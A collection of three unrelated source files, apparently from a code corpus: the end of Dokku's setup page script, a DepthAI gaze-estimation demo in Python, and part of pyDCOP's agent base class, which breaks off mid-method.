<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
main.py
|
import argparse
import queue
import threading
import signal
from pathlib import Path
import cv2
import depthai
import numpy as np
from imutils.video import FPS
from math import cos, sin
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)")
parser.add_argument('-laz', '--lazer', action="store_true", help="Lazer mode")
args = parser.parse_args()
debug = not args.no_debug
camera = not args.video
if args.camera and args.video:
raise ValueError("Incorrect command line parameters! \"-cam\" cannot be used with \"-vid\"!")
elif args.camera is False and args.video is None:
raise ValueError("Missing inference source! Either use \"-cam\" to run on DepthAI camera or \"-vid <path>\" to run on video file")
def draw_3d_axis(image, head_pose, origin, size=50):
# From https://github.com/openvinotoolkit/open_model_zoo/blob/b1ff98b64a6222cf6b5f3838dc0271422250de95/demos/gaze_estimation_demo/cpp/src/results_marker.cpp#L50
origin_x,origin_y = origin
yaw,pitch, roll = np.array(head_pose)*np.pi / 180
sinY = sin(yaw )
sinP = sin(pitch )
sinR = sin(roll )
cosY = cos(yaw )
cosP = cos(pitch )
cosR = cos(roll )
# X axis (red)
x1 = origin_x + size * (cosR * cosY + sinY * sinP * sinR)
y1 = origin_y + size * cosP * sinR
cv2.line(image, (origin_x, origin_y), (int(x1), int(y1)), (0, 0, 255), 3)
# Y axis (green)
x2 = origin_x + size * (cosR * sinY * sinP + cosY * sinR)
y2 = origin_y - size * cosP * cosR
cv2.line(image, (origin_x, origin_y), (int(x2), int(y2)), (0, 255, 0), 3)
# Z axis (blue)
x3 = origin_x + size * (sinY * cosP)
y3 = origin_y + size * sinP
cv2.line(image, (origin_x, origin_y), (int(x3), int(y3)), (255, 0, 0), 2)
return image
def frame_norm(frame, bbox):
norm_vals = np.full(len(bbox), frame.shape[0])
norm_vals[::2] = frame.shape[1]
return (np.clip(np.array(bbox), 0, 1) * norm_vals).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
return [val for channel in cv2.resize(arr, shape).transpose(2, 0, 1) for y_col in channel for val in y_col]
def to_tensor_result(packet):
return {
tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
for tensor in packet.getRaw().tensors
}
def padded_point(point, padding, frame_shape=None):
if frame_shape is None:
return [
point[0] - padding,
point[1] - padding,
point[0] + padding,
point[1] + padding
]
else:
def norm(val, dim):
return max(0, min(val, dim))
if np.any(point - padding > frame_shape[:2]) or np.any(point + padding < 0):
print(f"Unable to create padded box for point {point} with padding {padding} and frame shape {frame_shape[:2]}")
return None
return [
norm(point[0] - padding, frame_shape[0]),
norm(point[1] - padding, frame_shape[1]),
norm(point[0] + padding, frame_shape[0]),
norm(point[1] + padding, frame_shape[1])
]
def create_pipeline():
print("Creating pipeline...")
pipeline = depthai.Pipeline()
pipeline.setOpenVINOVersion(depthai.OpenVINO.VERSION_2020_3)
if camera:
print("Creating Color Camera...")
cam = pipeline.createColorCamera()
cam.setPreviewSize(300, 300)
cam.setResolution(depthai.ColorCameraProperties.SensorResolution.THE_1080_P)
cam.setInterleaved(False)
cam.setBoardSocket(depthai.CameraBoardSocket.RGB)
cam_xout = pipeline.createXLinkOut()
cam_xout.setStreamName("cam_out")
cam.preview.link(cam_xout.input)
# NeuralNetwork
print("Creating Face Detection Neural Network...")
face_nn = pipeline.createNeuralNetwork()
face_nn.setBlobPath(str(Path("models/face-detection-retail-0004/face-detection-retail-0004_openvino_2020.1_4shave.blob").resolve().absolute()))
if camera:
cam.preview.link(face_nn.input)
else:
face_in = pipeline.createXLinkIn()
face_in.setStreamName("face_in")
face_in.out.link(face_nn.input)
face_nn_xout = pipeline.createXLinkOut()
face_nn_xout.setStreamName("face_nn")
face_nn.out.link(face_nn_xout.input)
# NeuralNetwork
print("Creating Landmarks Detection Neural Network...")
land_nn = pipeline.createNeuralNetwork()
land_nn.setBlobPath(
str(Path("models/landmarks-regression-retail-0009/landmarks-regression-retail-0009_openvino_2020.1_4shave.blob").resolve().absolute())
)
land_nn_xin = pipeline.createXLinkIn()
land_nn_xin.setStreamName("landmark_in")
land_nn_xin.out.link(land_nn.input)
land_nn_xout = pipeline.createXLinkOut()
land_nn_xout.setStreamName("landmark_nn")
land_nn.out.link(land_nn_xout.input)
# NeuralNetwork
print("Creating Head Pose Neural Network...")
pose_nn = pipeline.createNeuralNetwork()
pose_nn.setBlobPath(
str(Path("models/head-pose-estimation-adas-0001/head-pose-estimation-adas-0001_openvino_2020.1_4shave.blob").resolve().absolute())
)
pose_nn_xin = pipeline.createXLinkIn()
pose_nn_xin.setStreamName("pose_in")
pose_nn_xin.out.link(pose_nn.input)
pose_nn_xout = pipeline.createXLinkOut()
pose_nn_xout.setStreamName("pose_nn")
pose_nn.out.link(pose_nn_xout.input)
# NeuralNetwork
print("Creating Gaze Estimation Neural Network...")
gaze_nn = pipeline.createNeuralNetwork()
gaze_nn.setBlobPath(
str(Path("models/gaze-estimation-adas-0002/gaze-estimation-adas-0002_openvino_2020.1_4shave.blob").resolve().absolute())
)
gaze_nn_xin = pipeline.createXLinkIn()
gaze_nn_xin.setStreamName("gaze_in")
gaze_nn_xin.out.link(gaze_nn.input)
gaze_nn_xout = pipeline.createXLinkOut()
gaze_nn_xout.setStreamName("gaze_nn")
gaze_nn.out.link(gaze_nn_xout.input)
return pipeline
class Main:
def __init__(self, device):
self.device = device
print("Starting pipeline...")
self.device.startPipeline()
if camera:
self.cam_out = self.device.getOutputQueue("cam_out")
else:
self.face_in = self.device.getInputQueue("face_in")
if not camera:
self.cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
self.frame = None
self.face_box_q = queue.Queue()
self.bboxes = []
self.left_bbox = None
self.right_bbox = None
self.nose = None
self.pose = None
self.gaze = None
self.running = True
self.fps = FPS()
self.fps.start()
def face_thread(self):
face_nn = self.device.getOutputQueue("face_nn")
landmark_in = self.device.getInputQueue("landmark_in")
pose_in = self.device.getInputQueue("pose_in")
while self.running:
if self.frame is None:
continue
try:
bboxes = np.array(face_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
bboxes = bboxes.reshape((bboxes.size // 7, 7))
self.bboxes = bboxes[bboxes[:, 2] > 0.7][:, 3:7]
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
det_frame = self.frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
land_data = depthai.NNData()
land_data.setLayer("0", to_planar(det_frame, (48, 48)))
landmark_in.send(land_data)
pose_data = depthai.NNData()
pose_data.setLayer("data", to_planar(det_frame, (60, 60)))
pose_in.send(pose_data)
self.face_box_q.put(bbox)
def land_pose_thread(self):
landmark_nn = self.device.getOutputQueue(name="landmark_nn", maxSize=1, blocking=False)
pose_nn = self.device.getOutputQueue(name="pose_nn", maxSize=1, blocking=False)
gaze_in = self.device.getInputQueue("gaze_in")
while self.running:
try:
land_in = landmark_nn.get().getFirstLayerFp16()
except RuntimeError as ex:
continue
try:
face_bbox = self.face_box_q.get(block=True, timeout=100)
except queue.Empty:
continue
self.face_box_q.task_done()
left = face_bbox[0]
top = face_bbox[1]
face_frame = self.frame[face_bbox[1]:face_bbox[3], face_bbox[0]:face_bbox[2]]
land_data = frame_norm(face_frame, land_in)
land_data[::2] += left
land_data[1::2] += top
left_bbox = padded_point(land_data[:2], padding=30, frame_shape=self.frame.shape)
if left_bbox is None:
print("Point for left eye is corrupted, skipping nn result...")
continue
self.left_bbox = left_bbox
right_bbox = padded_point(land_data[2:4], padding=30, frame_shape=self.frame.shape)
if right_bbox is None:
print("Point for right eye is corrupted, skipping nn result...")
continue
self.right_bbox = right_bbox
self.nose = land_data[4:6]
left_img = self.frame[self.left_bbox[1]:self.left_bbox[3], self.left_bbox[0]:self.left_bbox[2]]
right_img = self.frame[self.right_bbox[1]:self.right_bbox[3], self.right_bbox[0]:self.right_bbox[2]]
try:
# The output of pose_nn is in YPR format, which is the required sequence input for pose in gaze
# https://docs.openvinotoolkit.org/2020.1/_models_intel_head_pose_estimation_adas_0001_description_head_pose_estimation_adas_0001.html
# https://docs.openvinotoolkit.org/latest/omz_models_model_gaze_estimation_adas_0002.html
# ... three head pose angles – (yaw, pitch, and roll) ...
values = to_tensor_result(pose_nn.get())
self.pose = [
values['angle_y_fc'][0][0],
values['angle_p_fc'][0][0],
values['angle_r_fc'][0][0]
]
except RuntimeError as ex:
continue
gaze_data = depthai.NNData()
gaze_data.setLayer("left_eye_image", to_planar(left_img, (60, 60)))
gaze_data.setLayer("right_eye_image", to_planar(right_img, (60, 60)))
gaze_data.setLayer("head_pose_angles", self.pose)
gaze_in.send(gaze_data)
def gaze_thread(self):
gaze_nn = self.device.getOutputQueue("gaze_nn")
while self.running:
try:
self.gaze = np.array(gaze_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
def should_run(self):
if self.running:
return True if camera else self.cap.isOpened()
else:
return False
def get_frame(self, retries=0):
if camera:
return True, np.array(self.cam_out.get().getData()).reshape((3, 300, 300)).transpose(1, 2, 0).astype(np.uint8)
else:
read_correctly, new_frame = self.cap.read()
if not read_correctly or new_frame is None:
if retries < 5:
return self.get_frame(retries+1)
else:
print("Source closed, terminating...")
return False, None
else:
return read_correctly, new_frame
def run(self):
self.threads = [
threading.Thread(target=self.face_thread),
threading.Thread(target=self.land_pose_thread),
threading.Thread(target=self.gaze_thread)
]
for thread in self.threads:
thread.start()
while self.should_run():
try:
read_correctly, new_frame = self.get_frame()
except RuntimeError:
continue
if not read_correctly:
break
self.fps.update()
self.frame = new_frame
self.debug_frame = self.frame.copy()
if not camera:
nn_data = depthai.NNData()
nn_data.setLayer("data", to_planar(self.frame, (300, 300)))
self.face_in.send(nn_data)
if debug: # face
if self.gaze is not None and self.left_bbox is not None and self.right_bbox is not None:
re_x = (self.right_bbox[0] + self.right_bbox[2]) // 2
re_y = (self.right_bbox[1] + self.right_bbox[3]) // 2
le_x = (self.left_bbox[0] + self.left_bbox[2]) // 2
le_y = (self.left_bbox[1] + self.left_bbox[3]) // 2
x, y = (self.gaze * 100).astype(int)[:2]
if args.lazer:
beam_img = np.zeros(self.debug_frame.shape, np.uint8)
for t in range(10)[::-2]:
cv2.line(beam_img, (re_x, re_y), ((re_x + x*100), (re_y - y*100)), (0, 0, 255-t*10), t*2)
cv2.line(beam_img, (le_x, le_y), ((le_x + x*100), (le_y - y*100)), (0, 0, 255-t*10), t*2)
self.debug_frame |= beam_img
else:
cv2.arrowedLine(self.debug_frame, (le_x, le_y), (le_x + x, le_y - y), (255, 0, 255), 3)
cv2.arrowedLine(self.debug_frame, (re_x, re_y), (re_x + x, re_y - y), (255, 0, 255), 3)
if not args.lazer:
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
cv2.rectangle(self.debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (10, 245, 10), 2)
if self.nose is not None:
cv2.circle(self.debug_frame, (self.nose[0], self.nose[1]), 2, (0, 255, 0), thickness=5, lineType=8, shift=0)
if self.left_bbox is not None:
cv2.rectangle(self.debug_frame, (self.left_bbox[0], self.left_bbox[1]), (self.left_bbox[2], self.left_bbox[3]), (245, 10, 10), 2)
if self.right_bbox is not None:
cv2.rectangle(self.debug_frame, (self.right_bbox[0], self.right_bbox[1]), (self.right_bbox[2], self.right_bbox[3]), (245, 10, 10), 2)
if self.pose is not None and self.nose is not None:
draw_3d_axis(self.debug_frame, self.pose, self.nose)
if camera:
cv2.imshow("Camera view", self.debug_frame)
else:
aspect_ratio = self.frame.shape[1] / self.frame.shape[0]
cv2.imshow("Video view", cv2.resize(self.debug_frame, (int(900), int(900 / aspect_ratio))))
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
break
self.fps.stop()
print("FPS: {:.2f}".format(self.fps.fps()))
if not camera:
self.cap.release()
cv2.destroyAllWindows()
for i in range(1, 5): # https://stackoverflow.com/a/25794701/5494277
cv2.waitKey(1)
self.running = False
with depthai.Device(create_pipeline()) as device:
app = Main(device)
# Register a graceful CTRL+C shutdown
def signal_handler(sig, frame):
app.running = False
signal.signal(signal.SIGINT, signal_handler)
app.run()
for thread in app.threads:
thread.join()
|
agents.py
|
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Base 'Agent' classes.
An Agent instance is a stand-alone autonomous object. It hosts computations,
which send messages to each other.
Each agent has its own thread, which is used to handle messages as they are
dispatched to computations hosted on this agent.
"""
import logging
import sys
import threading
import traceback
import random
from functools import partial
from importlib import import_module
from threading import Thread
from time import perf_counter, sleep
from typing import Dict, List, Optional, Union, Callable, Tuple
from collections import defaultdict
from pydcop.algorithms import AlgorithmDef, ComputationDef, load_algorithm_module
from pydcop.dcop.objects import AgentDef, create_binary_variables
from pydcop.dcop.objects import BinaryVariable
from pydcop.dcop.relations import Constraint
from pydcop.infrastructure.Events import event_bus
from pydcop.infrastructure.communication import Messaging, \
CommunicationLayer, UnreachableAgent
from pydcop.infrastructure.computations import MessagePassingComputation, \
build_computation
from pydcop.infrastructure.discovery import Discovery, UnknownComputation, \
UnknownAgent, _is_technical
from pydcop.infrastructure.ui import UiServer
from pydcop.reparation import create_computation_hosted_constraint, \
create_agent_capacity_constraint, create_agent_hosting_constraint, \
create_agent_comp_comm_constraint
class AgentException(Exception):
pass
class Agent(object):
"""
Object representing an agent.
An agent communicates with other agents though messages, using a
`CommunicationLayer`
An agent hosts message passing computations and run these computations on
its own thread.
Notes
-----
An agent does not necessarily need to known it's own definition (see
agent_def argument) but is needs it for some use like replication in
resilient DCOP.
Parameters
----------
name: str
name of the agent
comm: CommunicationLayer
object used to send and receive messages
agent_def: AgentDef
definition of this agent, optional
ui_port: int
the port on which to run the ui-server. If not given, no ui-server is
started.
delay: int
An optional delay between message delivery, in second. This delay
only applies to algorithm's messages and is useful when you want to
observe (for example with the GUI) the behavior of the algorithm at
runtime.
daemon: boolean
indicates if the agent should use a daemon thread (defaults to False)
See Also
--------
MessagePassingComputation, CommunicationLayer
"""
def __init__(self, name,
comm: CommunicationLayer,
agent_def: AgentDef=None,
ui_port: int=None,
delay: float=None,
daemon: bool=False):
self._name = name
self.agent_def = agent_def
self.logger = logging.getLogger('pydcop.agent.' + name)
self.agt_metrics = AgentMetrics()
# Setup communication and discovery
self._comm = comm
self.discovery = Discovery(self._name, self.address)
self._comm.discovery = self.discovery
self._messaging = Messaging(name, comm, delay=delay)
self.discovery.discovery_computation.message_sender = \
self._messaging.post_msg
# Ui server
self._ui_port = ui_port
self._ui_server = None
self.t = Thread(target=self._run, name='thread_'+name)
self.t.daemon = daemon
self._stopping = threading.Event()
self._shutdown = threading.Event()
self._running = False
# _idle means that we have finished to handle all incoming messages
self._idle = False
self._computations = {} # type: Dict[str, MessagePassingComputation]
self.t_active = 0
# time when run the first non-technical computation is run
self._run_t = None
# time when starting the agent
self._start_t = None
# Tasks that must run periodically as {callable: (period, last_run)}
self._periodic_cb = {} # type: Dict[Callable, Tuple[float, float]]
# List of paused computations, any computation whose name is in this
# list will not receive any message.
self.paused_computations = []
@property
def communication(self)-> CommunicationLayer:
"""
The communication used by this agent.
Returns
-------
CommunicationLayer
The communication used by this agent.
"""
return self._comm
def add_computation(self, computation: MessagePassingComputation,
comp_name=None, publish=True):
"""
Add a computation to the agent.
The computation will run on this agent thread and receives messages
through his Messaging and CommunicationLayer.
Parameters
----------
computation: a MessagePassingComputation
the computation to be added
comp_name: str
an optional name for the computation, if not given
computation.name will be used.
publish: bool
True (default) is the computation must be published on the
discovery service.
"""
comp_name = computation.name if comp_name is None else comp_name
self.logger.debug('Add computation %s - %s ',
comp_name, self._messaging)
computation.message_sender = self._messaging.post_msg
computation.periodic_action_handler = self
self._computations[comp_name] = computation
self.discovery.register_computation(comp_name, self.name,self.address,
publish=publish)
# start lookup for agent hosting a neighbor computation
if hasattr(computation, 'computation_def') and \
computation.computation_def is not None:
for n in computation.computation_def.node.neighbors:
self.discovery.subscribe_computation(n)
if hasattr(computation, '_on_value_selection'):
computation._on_value_selection = notify_wrap(
computation._on_value_selection,
partial(self._on_computation_value_changed, computation.name))
if hasattr(computation, '_on_new_cycle'):
computation._on_new_cycle = notify_wrap(
computation._on_new_cycle,
partial(self._on_computation_new_cycle, computation.name))
computation.finished = notify_wrap(
computation.finished,
partial(self._on_computation_finished, computation.name))
event_bus.send("agents.add_computation."+self.name,
(self.name, computation))
def remove_computation(self, computation: str) -> None:
"""
Removes a computation from the agent.
Parameters
----------
computation: str
the name of the computation
Raises
------
UnknownComputation
If there is no computation with this name on this agent
"""
try:
comp = self._computations.pop(computation)
except KeyError:
self.logger.error(
'Removing unknown computation %s - current commutations : %s',
computation, self._computations)
raise UnknownComputation(computation)
if comp.is_running:
comp.stop()
self.logger.debug('Removing computation %s', comp)
self.discovery.unregister_computation(computation, self.name)
event_bus.send("agents.rem_computation."+self.name,
(self.name, computation))
def computations(self, include_technical=False)-> \
List[MessagePassingComputation]:
"""
Computations hosted on this agent.
Parameters
----------
include_technical: bool
If True, technical computations (like discovery, etc.) are
included in the list.
Returns
-------
List[MessagePassingComputation]
A list of computations hosted on this agents. This list is a copy
and can be safely modified.
"""
if include_technical:
return list(self._computations.values())
else:
return [c for c in self._computations.values()
if not c.name.startswith('_')]
def computation(self, name: str) -> MessagePassingComputation:
"""
Get a computation hosted by this agent.
Parameters
----------
name: str
The name of the computation.
Returns
-------
The Messaging passing corresponding to the given name.
Raises
------
UnknownComputation
if the agent has no computation with this name.
See Also
--------
add_computation
"""
try:
return self._computations[name]
except KeyError:
self.logger.error('unknown computation %s', name)
raise UnknownComputation('unknown computation ' + name)
@property
def address(self):
"""
The address this agent can be reached at.
The type of the address depends on the instance and type of the
CommunicationLayer used by this agent.
Returns
-------
The address this agent can be reached at.
"""
return self._comm.address
def start(self, run_computations = False):
"""
Starts the agent.
One started, an agent will dispatch any received message to the
corresponding target computation.
Notes
-----
Each agent has it's own thread, this will start the agent's thread,
run the _on_start callback and waits for message. Incoming message are
added to a queue and handled by calling the _handle_message callback.
The agent (and its thread) will stop once stop() has been called and
he has finished handling the current message, if any.
See Also
--------
_on_start(), stop()
"""
if self.is_running:
raise AgentException('Cannot start agent {}, already running '
.format(self.name))
self.logger.info('Starting agent %s ', self.name)
self._running = True
self.run_computations = run_computations
self._start_t = perf_counter()
self.t.start()
def run(self, computations: Optional[Union[str, List[str]]]=None):
"""
Run computations hosted on this agent.
Notes
-----
Attempting to start an already running computation is harmless : it
will be logged but will not raise an exception.
The first time this method is called, timestamp is stored, which is used
as a reference when computing metrics.
Parameters
----------
computations: Optional[Union[str, List[str]]]
An optional computation name or list of computation names. If None,
all computations hosted on this agent are started.
Raises
------
AgentException
If the agent was not started (using agt.start()) before calling
run().
UnknownComputation
If some of the computations are not hosted on this agent. All
computations really hosted on the agent are started before raising
this Exception.
"""
if not self.is_running:
raise AgentException('Cannot start computation on agent %s which '
'is not started', self.name)
if computations is None:
self.logger.info('Starting all computations')
else:
if isinstance(computations, str):
computations = [computations]
else:
# avoid modifying caller's variable
computations = computations[:]
self.logger.info('Starting computations %s', computations)
if self._run_t is None:
# We start counter time only when the first computation is run,
# to avoid counting idle time when we wait for orders.
self._run_t = perf_counter()
on_start_t = perf_counter()
for c in list(self._computations.values()):
if computations is None:
if c.is_running:
self.logger.debug(f'Do not start computation {c.name}, already '
'running')
else:
c.start()
elif c.name in computations:
if c.is_running:
self.logger.debug(f'Do not start computation {c.name}, already '
'running')
else:
c.start()
computations.remove(c.name)
# add the time spent in on_start to the active time of the agent.
self.t_active += perf_counter() - on_start_t
if computations:
raise UnknownComputation('Could not start unknown computation %s',
computations)
@property
def start_time(self)-> float:
"""
float:
timestamp for the first run computation call. This timestamp is
used as a reference when computing various time-related metrics.
"""
return self._run_t
def clean_shutdown(self):
"""
Perform a clean shutdown of the agent.
All pending messages are handled before stopping the agent thread.
This method returns immediately, use `join` to wait until the agent's
thread has stopped.
"""
self.logger.debug('Clean shutdown requested')
self._shutdown.set()
self._messaging.shutdown()
def stop(self):
"""
Stops the agent
A computation cannot be interrupted while it handle a message,
as a consequence the agent (and its thread) will stop once it he has
finished handling the current message, if any.
"""
self.logger.debug('Stop requested on %s', self.name)
self._stopping.set()
def pause_computations(self, computations: Union[str, Optional[List[str]]]):
"""
Pauses computations.
Parameters
----------
computations: Union[str, Optional[List[str]]]
The name of the computation to pause, or a list of computations
names. If None, all hosted computation will be paused.
Raises
------
AgentException
If the agent was not started (using agt.start()) before calling
pause_computations().
UnknownComputation
If some of the computations are not hosted on this agent. All
computations really hosted on the agent are paused before raising
this exception.
"""
if not self.is_running:
raise AgentException('Cannot pause computations on agent %s which '
'is not started')
if computations is None:
self.logger.info('Pausing all computations')
else:
if isinstance(computations, str):
computations = [computations]
else:
computations = computations[:]
self.logger.info('Pausing computations %s', computations)
for c in self._computations.values():
if computations is None:
if c.is_paused:
self.logger.warning('Cannot pause computation %s, already '
'paused', c.name)
else:
c.pause(True)
elif c.name in computations:
if c.is_paused:
self.logger.warning('Cannot pause computation %s, already '
'paused', c.name)
else:
c.pause(True)
computations.remove(c.name)
if computations:
raise UnknownComputation('Could not pause unknown computation %s',
computations)
def unpause_computations(self,
computations: Union[str, Optional[List[str]]]):
"""
Un-pause (i.e. resume) computations
Parameters
----------
computations: Optional[List[str]]
TThe name of the computation to resume, or a list of computations
names. If None, all hosted computations will be resumed.
Raises
------
AgentException
If the agent was not started (using agt.start()) before calling
unpause_computations().
UnknownComputation
If some of the computations are not hosted on this agent. All
computations really hosted on the agent are resumed before raising
this exception.
"""
if not self.is_running:
raise AgentException('Cannot resume computations on agent %s which '
'is not started')
if computations is None:
self.logger.info('Resuming all computations')
else:
if isinstance(computations, str):
computations = [computations]
else:
computations = computations[:]
self.logger.info('Resuming computations %s', computations)
for c in self._computations.values():
if computations is None:
if not c.is_paused:
self.logger.warning('Do not resume computation %s, not '
'paused', c.name)
else:
c.pause(False)
elif c.name in computations:
if not c.is_paused:
self.logger.warning('Do not resume computation %s, not '
'paused', c.name)
else:
c.pause(False)
computations.remove(c.name)
if computations:
raise UnknownComputation('Could not resume unknown computation %s',
computations)
@property
def name(self):
"""
str:
The name of the agent.
"""
return self._name
@property
def is_stopping(self)-> bool:
"""
bool:
True if the agent is currently stopping (i.e. handling its last
message).
"""
return self._stopping.is_set()
@property
def is_running(self):
"""
bool:
True if the agent is currently running.
"""
return self._running
def join(self):
self.t.join()
def _on_start(self):
"""
This method is called when the agent starts.
Notes
-----
This method is meant to be overwritten in subclasses that might need to
perform some operations on startup. Do NOT forget to call
`super()._on_start()` ! When `super()._on_start()` return `False`,
you must also return `False` !
This method is always run in the agent's thread, even though the
`start()` method is called from an other thread.
Returns
-------
status: boolean
True if all went well, False otherwise
"""
self.logger.debug('on_start for {}'.format(self.name))
if self._ui_port:
event_bus.enabled = True
self._ui_server = UiServer(self, self._ui_port)
self.add_computation(self._ui_server, publish=False)
self._ui_server.start()
else:
self.logger.debug('No ui server for %s', self.name)
self._computations[self.discovery.discovery_computation.name] = \
self.discovery.discovery_computation
while True:
# Check _stopping: do not prevent agent form stopping !
if self._stopping.is_set():
return False
try:
self.discovery.register_computation(
self.discovery.discovery_computation.name,
self.name, self.address)
except UnreachableAgent:
self.logger.warning("Could not reach directory, will retry "
"later")
sleep(1)
else:
break
self.discovery.register_agent(self.name, self.address)
self.discovery.discovery_computation.start()
return True
def _on_stop(self):
"""
This method is called when the agent has stopped.
It is meant to be overwritten in subclasses that might need to
perform some operations on stop, however, when overwriting it,
you MUST call `super()._on_stop()`.
Notes
-----
This method always run in the agent's thread. Messages can still be
sent in this message, but no new message will be received (as the
agent's thread has stopped)
"""
self.logger.debug('on_stop for %s with computations %s ',
self.name, self.computations())
# Unregister computations and agent from discovery.
# This will also unregister any discovery callbacks this agent may still
# have.
for comp in self.computations():
comp.stop()
if not _is_technical(comp.name):
try:
self.discovery.unregister_computation(comp.name)
except UnreachableAgent:
# when stopping the agent, the orchestrator / directory might have
# already left.
pass
if self._ui_server:
self._ui_server.stop()
try:
# Wait a bit to make sure that the stopped message can reach the
# orchestrator before unregistration.
sleep(0.5)
self.discovery.unregister_agent(self.name)
except UnreachableAgent:
# when stopping the agent, the orchestrator / directory might have
# already left.
pass
def _on_computation_value_changed(self, computation: str, value,
cost, cycle):
"""Called when a computation selects a new value """
pass
def _on_computation_new_cycle(self, computation, *args, **kwargs):
"""Called when a computation starts a new cycle"""
pass
def _on_computation_finished(self, computation: str,
*args, **kwargs):
"""
Called when a computation finishes.
This method is meant to be overwritten in sub-classes.
Parameters
----------
computation: str
name of the computation that just ended.
"""
pass
def _handle_message(self, sender_name: str, dest_name: str, msg, t):
# messages are delivered even to computations which have reached their
# stop condition. It's up the the algorithm to decide if it wants to
# handle the message.
dest = self.computation(dest_name)
dest.on_message(sender_name, msg, t)
def metrics(self):
if self._run_t is None:
activity_ratio = 0
else:
total_t = perf_counter() - self._run_t
activity_ratio = self.t_active / (total_t)
own_computations = { c.name for c in self.computations(include_technical=True)}
m = {
'count_ext_msg': {k: v
for k, v in self._messaging.count_ext_msg.items()
if k in own_computations},
'size_ext_msg': {k: v
for k, v in self._messaging.size_ext_msg.items()
if k in own_computations},
# 'last_msg_time': self._messaging.last_msg_time,
'activity_ratio': activity_ratio,
'cycles': {c.name: c.cycle_count for c in self.computations()}
}
return m
def messages_count(self, computation: str):
return self._messaging.count_ext_msg[computation]
def messages_size(self, computation: str):
return self._messaging.size_ext_msg[computation]
def set_periodic_action(self, period: float, cb: Callable):
"""
Set a periodic action.
The callback `cb` will be called every `period` seconds. The delay
is not strict. The handling of a message is never interrupted,
if it takes longer than `period`, the callback will be delayed and
will only be called once the task has finished.
Parameters
----------
period: float
a period in second
cb: Callable
a callback with no argument
Returns
-------
handle:
An handle that can be used to remove the periodic action.
This handle is actually the callback object itself.
"""
assert period != None
assert cb != None
self.logger.debug("Add periodic action %s - %s ", period, cb)
self._periodic_cb[cb] = (period, perf_counter())
return cb
def remove_periodic_action(self, handle):
"""
Remove a periodic action
Parameters
----------
handle:
the handle returned by set_periodic_action
"""
self.logger.debug("Remove action %s ", handle)
self._periodic_cb.pop(handle)
def _run(self):
self.logger.debug('Running agent ' + self._name)
full_msg = None
try:
self._running = True
self._on_start()
if self.run_computations:
self.run()
while not self._stopping.is_set():
# Process messages, if any
full_msg, t = self._messaging.next_msg(0.05)
if full_msg is None:
self._idle = True
if self._shutdown.is_set():
self.logger.info("No message during shutdown, "
"stopping agent thread")
break
else:
current_t = perf_counter()
try:
sender, dest, msg, _ = full_msg
